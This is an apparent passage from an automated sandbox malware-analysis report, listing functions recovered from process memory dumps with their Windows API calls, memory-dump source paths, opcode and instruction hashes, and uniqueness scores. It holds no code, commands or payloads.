                                                                          • Instruction ID: 49d34daab6013fe6119bf072679c70ddb775590b322b11d539ca547898ef9f38
                                                                          • Opcode Fuzzy Hash: 9d45332e97c0fe3723a768c3aea7aef077f50df4fe86285ec892e84128b24734
                                                                          • Instruction Fuzzy Hash: EAA13CB4A04228CFCB25DF30C8947ADB7B2BF89245F1081E9D649A3750DB399E86CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DAE5130, Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DAE52A2
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741594320.000000001DAE0000.00000040.00000001.sdmp, Offset: 1DAE0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 0b73028bd7cac040787242306bf4f5ecb4dd61335e52dc8c97942f3a34496165
                                                                          • Instruction ID: 8ecadcc24b5761f1960cbeee9f6cdd0fceb8bc0d4c734ca8bd8c437a27d30a5d
                                                                          • Opcode Fuzzy Hash: 0b73028bd7cac040787242306bf4f5ecb4dd61335e52dc8c97942f3a34496165
                                                                          • Instruction Fuzzy Hash: 4A612171C04249EFDF01DF99D880ADEBFB1BF49350F14812AE808AB261E775A855CF92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D7309D8, Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741205104.000000001D730000.00000040.00000001.sdmp, Offset: 1D730000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4a7c1aefc7edb7e63203eb375460ec6594616de6baa258f01112512812fb990e
                                                                          • Instruction ID: f8ada8e21ad72ac7bfbbada240fe6a36b7c877c3de6c085500c90d0527d4b7d1
                                                                          • Opcode Fuzzy Hash: 4a7c1aefc7edb7e63203eb375460ec6594616de6baa258f01112512812fb990e
                                                                          • Instruction Fuzzy Hash: 77415671E083998FCB01CF75D8402EEBBF1AF89224F1581ABD545E7251DB78A845CBE2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DAE5190, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DAE52A2
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741594320.000000001DAE0000.00000040.00000001.sdmp, Offset: 1DAE0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 32b44c852f96da41479fd95e5d2c393eb00cd2cdeaf5fb14c5b3cf845907621b
                                                                          • Instruction ID: be26615853bfd691595522290b7d97c4eb9b1453d0401b5ff769b40b600de976
                                                                          • Opcode Fuzzy Hash: 32b44c852f96da41479fd95e5d2c393eb00cd2cdeaf5fb14c5b3cf845907621b
                                                                          • Instruction Fuzzy Hash: C341EFB1D10309DFDB14CF9AD880ADEBBB5BF48344F20812AE819AB210D775A845CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DAE7C66, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 1DAE7CF9
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741594320.000000001DAE0000.00000040.00000001.sdmp, Offset: 1DAE0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: CallProcWindow
                                                                          • String ID:
                                                                          • API String ID: 2714655100-0
                                                                          • Opcode ID: ac5fea418d4a641b8352f3b95390d8f06fd61f7004d0747c86151173eb2dd97a
                                                                          • Instruction ID: 64c9318495df401c3311a1a940aa070d18ebbaa065ecc85c2eac8c74edfead45
                                                                          • Opcode Fuzzy Hash: ac5fea418d4a641b8352f3b95390d8f06fd61f7004d0747c86151173eb2dd97a
                                                                          • Instruction Fuzzy Hash: D63116B9A003459FDB04CF59C484AAABBF5FF88324F25C459D519AB321D335A845CF61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DAEBDF9, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 1DAEBE82
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741594320.000000001DAE0000.00000040.00000001.sdmp, Offset: 1DAE0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: EncodePointer
                                                                          • String ID:
                                                                          • API String ID: 2118026453-0
                                                                          • Opcode ID: 38e3a83f77a3a4dd651e93806a482258732aac3a0889c66d976a43bd03d802ac
                                                                          • Instruction ID: 2551d2cf41d5b749919d3c59c92fcf99b5a4fc46b38ca65a722816e51fcbb765
                                                                          • Opcode Fuzzy Hash: 38e3a83f77a3a4dd651e93806a482258732aac3a0889c66d976a43bd03d802ac
                                                                          • Instruction Fuzzy Hash: 0D31DF74805744CFCB00DFA9D58879EBFB5EB06314F08816AC549A7241D77A6809CBA3
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DAE6D71, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DAE6DFF
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741594320.000000001DAE0000.00000040.00000001.sdmp, Offset: 1DAE0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 0a8774e590fbe85ccba5ff8a611d35886b2735bdbed69a86940d32291e6b55d4
                                                                          • Instruction ID: 4be88a38668d68c2e3ed53efd4dfce0709ae006817137af93cd94e27215b88ee
                                                                          • Opcode Fuzzy Hash: 0a8774e590fbe85ccba5ff8a611d35886b2735bdbed69a86940d32291e6b55d4
                                                                          • Instruction Fuzzy Hash: ED21E3B5D002489FDB00CFA9D884AEEBBF4FF48324F14841AE915A7350D379A954CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DAE2F30, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 1DAE4216
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741594320.000000001DAE0000.00000040.00000001.sdmp, Offset: 1DAE0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 3cfec7b1ec66f9919e16035a7846f4ad0ffd3f14ca430bb3f42444b1ab413012
                                                                          • Instruction ID: 7ed856d25a7695fd147bd4d3c55cc88e77eaa64a80239f10ebadf284f419083c
                                                                          • Opcode Fuzzy Hash: 3cfec7b1ec66f9919e16035a7846f4ad0ffd3f14ca430bb3f42444b1ab413012
                                                                          • Instruction Fuzzy Hash: E52134B1D043488BCB10DF9AD484ADEBBF4FB99314F05846AD459A7200C379A506CBA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DAE6D78, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DAE6DFF
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741594320.000000001DAE0000.00000040.00000001.sdmp, Offset: 1DAE0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: a478fa9d3d6ce807ef5b0c33b8d040df6afb2e23f0b8b9203eb1ab561330a1d5
                                                                          • Instruction ID: b71cfaa612374a177d4af80b9bf6718118287ae5c281189a3944de9db46c1eb1
                                                                          • Opcode Fuzzy Hash: a478fa9d3d6ce807ef5b0c33b8d040df6afb2e23f0b8b9203eb1ab561330a1d5
                                                                          • Instruction Fuzzy Hash: 5021D3B5D002489FDB10CFAAD884AEEFBF4FB48314F14841AE915A7350D379A954CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D732268, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 1D7322EB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741205104.000000001D730000.00000040.00000001.sdmp, Offset: 1D730000, based on PE: false
                                                                          Similarity
                                                                          • API ID: HookWindows
                                                                          • String ID:
                                                                          • API String ID: 2559412058-0
                                                                          • Opcode ID: 6210a633a144f8cf578dbbe92740ddc68ac636702ce8bbe2da54b40eeb27d3e1
                                                                          • Instruction ID: 37f42453b9b9fe95fb8f8f2969f9ec7ee520de4664144e124306b6b104a129d4
                                                                          • Opcode Fuzzy Hash: 6210a633a144f8cf578dbbe92740ddc68ac636702ce8bbe2da54b40eeb27d3e1
                                                                          • Instruction Fuzzy Hash: 87211575D042099FCB10CF9AD884BEEFBF5FB88320F10842AE859A7250C775A945CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D732270, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 1D7322EB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741205104.000000001D730000.00000040.00000001.sdmp, Offset: 1D730000, based on PE: false
                                                                          Similarity
                                                                          • API ID: HookWindows
                                                                          • String ID:
                                                                          • API String ID: 2559412058-0
                                                                          • Opcode ID: 8456fc79e5fd571aa920d306a68adbd5fe518c9336af478355bc3d2b29df920d
                                                                          • Instruction ID: 44ee7cfc60f3b978123716c036ec41ad34ecf2498f8e395d518a13c8b89ddd33
                                                                          • Opcode Fuzzy Hash: 8456fc79e5fd571aa920d306a68adbd5fe518c9336af478355bc3d2b29df920d
                                                                          • Instruction Fuzzy Hash: 8121E3B5D042099FCB10CF9AD884BEEFBF5FB88324F10842AE459A7250C775A945CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D739B60, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,1D73ADA9,00000800), ref: 1D73AE3A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741205104.000000001D730000.00000040.00000001.sdmp, Offset: 1D730000, based on PE: false
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 772615bbcf28b334c174ebac6c8e6689615b950bd42442098d51f8417e43bc1a
                                                                          • Instruction ID: 39007cf62d9501ed46ecef0485afef0e8eafb4cb2c7d2b1d01b9501823263746
                                                                          • Opcode Fuzzy Hash: 772615bbcf28b334c174ebac6c8e6689615b950bd42442098d51f8417e43bc1a
                                                                          • Instruction Fuzzy Hash: 0311F2B6D042489FCB10DF9AD445B9FBBF4AB88320F00842EE515A7200C379A945CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D73ADC8, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,1D73ADA9,00000800), ref: 1D73AE3A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741205104.000000001D730000.00000040.00000001.sdmp, Offset: 1D730000, based on PE: false
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 56a0fd3f980bab3ee89232cd9782fd87b6b8666b608dfba48bbfaa8e05cf53ad
                                                                          • Instruction ID: 45add62bb623649c29cb886513c272e5d6db7c41b05b7444824c350d2f1665c6
                                                                          • Opcode Fuzzy Hash: 56a0fd3f980bab3ee89232cd9782fd87b6b8666b608dfba48bbfaa8e05cf53ad
                                                                          • Instruction Fuzzy Hash: A41106B5D042499FCB10CFAAD484BDFBBB4AB59320F04846ED555A7201C379A945CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DAEBE08, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 1DAEBE82
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741594320.000000001DAE0000.00000040.00000001.sdmp, Offset: 1DAE0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: EncodePointer
                                                                          • String ID:
                                                                          • API String ID: 2118026453-0
                                                                          • Opcode ID: 039b569cd7a6a64356e1accd8dd0dd270b2c0abd959665e53b97630971950a00
                                                                          • Instruction ID: 88138c8ad6732e9532dc529ade9ae90abfe4b20c8459a30e490cd5d781a38fe1
                                                                          • Opcode Fuzzy Hash: 039b569cd7a6a64356e1accd8dd0dd270b2c0abd959665e53b97630971950a00
                                                                          • Instruction Fuzzy Hash: 5C118E70900B498FDB10DFA9D4487DEBBF5FB46324F10852AD40AA3700D73A6954CFA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DAE2F44, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 1DAE4216
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741594320.000000001DAE0000.00000040.00000001.sdmp, Offset: 1DAE0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 8307c0ecf2e61d44cebe7f8fc409b8866c609ae09759976d8f5dce0de43ea1da
                                                                          • Instruction ID: 35511dcb8762efcab3f2b4e1dfbab1316e3c6455e104569fcec143417466f5d6
                                                                          • Opcode Fuzzy Hash: 8307c0ecf2e61d44cebe7f8fc409b8866c609ae09759976d8f5dce0de43ea1da
                                                                          • Instruction Fuzzy Hash: EC11F3B5D006498BCB10CF9AD444BDEFBF4EB49210F11856AD419B7200C379A545CFA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DAE41AB, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 1DAE4216
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741594320.000000001DAE0000.00000040.00000001.sdmp, Offset: 1DAE0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 2e212fd04d5d7659d433233f78857e12fe925cfbe88306f2f5fc0532bb03ed69
                                                                          • Instruction ID: cfbd8791dd9591ea9c0dccc5ee86e402753022170426dfee95a09723412e6811
                                                                          • Opcode Fuzzy Hash: 2e212fd04d5d7659d433233f78857e12fe925cfbe88306f2f5fc0532bb03ed69
                                                                          • Instruction Fuzzy Hash: A611F0B5C006498BCB10CF9AD884BDEFBF8EB89310F11855AD419B7240C379A545CFA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DA1D450, Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741376155.000000001DA1D000.00000040.00000001.sdmp, Offset: 1DA1D000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d27bf7aae95ec09208dd971f685a1ff850e6d7127790cfe234605bf19c5a78af
                                                                          • Instruction ID: 3caf90da42b7b040606985a70c6fab34d683f6e37e3a02627d922dfe76f05650
                                                                          • Opcode Fuzzy Hash: d27bf7aae95ec09208dd971f685a1ff850e6d7127790cfe234605bf19c5a78af
                                                                          • Instruction Fuzzy Hash: 0121B0B5504284DFDF05EF18D8C0B27BB65FB84328F24C569E9094F246C336E856CAA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DA2D01C, Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741403326.000000001DA2D000.00000040.00000001.sdmp, Offset: 1DA2D000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f2e4f3b79ab5ce05393edc8e6a4c043030a0e3df4cf670800e98f0802eb13e07
                                                                          • Instruction ID: f54b2673b818e2c9ac5577455f7f743d9fb2cfed557cba710b163a2c6e89b781
                                                                          • Opcode Fuzzy Hash: f2e4f3b79ab5ce05393edc8e6a4c043030a0e3df4cf670800e98f0802eb13e07
                                                                          • Instruction Fuzzy Hash: D121D375508384DFCB05CF19D8C0B16BB61FB84714F64C569E94A4B257C336D807CAE2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DA2D007, Relevance: .1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741403326.000000001DA2D000.00000040.00000001.sdmp, Offset: 1DA2D000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 03e6b33df77a51974a32f2286cf39b1441f843dc59d4685aa90547cb52b8e339
                                                                          • Instruction ID: 79aa69797796baf453ef8d08acfbde4bdac7b7ffc651172b8dab5bc5b42d82d5
                                                                          • Opcode Fuzzy Hash: 03e6b33df77a51974a32f2286cf39b1441f843dc59d4685aa90547cb52b8e339
                                                                          • Instruction Fuzzy Hash: 972151755083C09FDB02CF14D994B16BF71EB46314F24C5EAD8498B2A7C33AD85ACBA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DA1D44B, Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741376155.000000001DA1D000.00000040.00000001.sdmp, Offset: 1DA1D000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 39890d0c15b2dce316aa1bcf411bfc0523472e4259f806fcf7e8684d3125290f
                                                                          • Instruction ID: fb94c127b606f10c648aee7510d9eed63e2a8104eab6abcb55aada4a5fbf41dd
                                                                          • Opcode Fuzzy Hash: 39890d0c15b2dce316aa1bcf411bfc0523472e4259f806fcf7e8684d3125290f
                                                                          • Instruction Fuzzy Hash: FE117F7A504280DFDF01DF14D5C4B16BF71FB84324F2486A9D8094B656C37AD45ACBA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions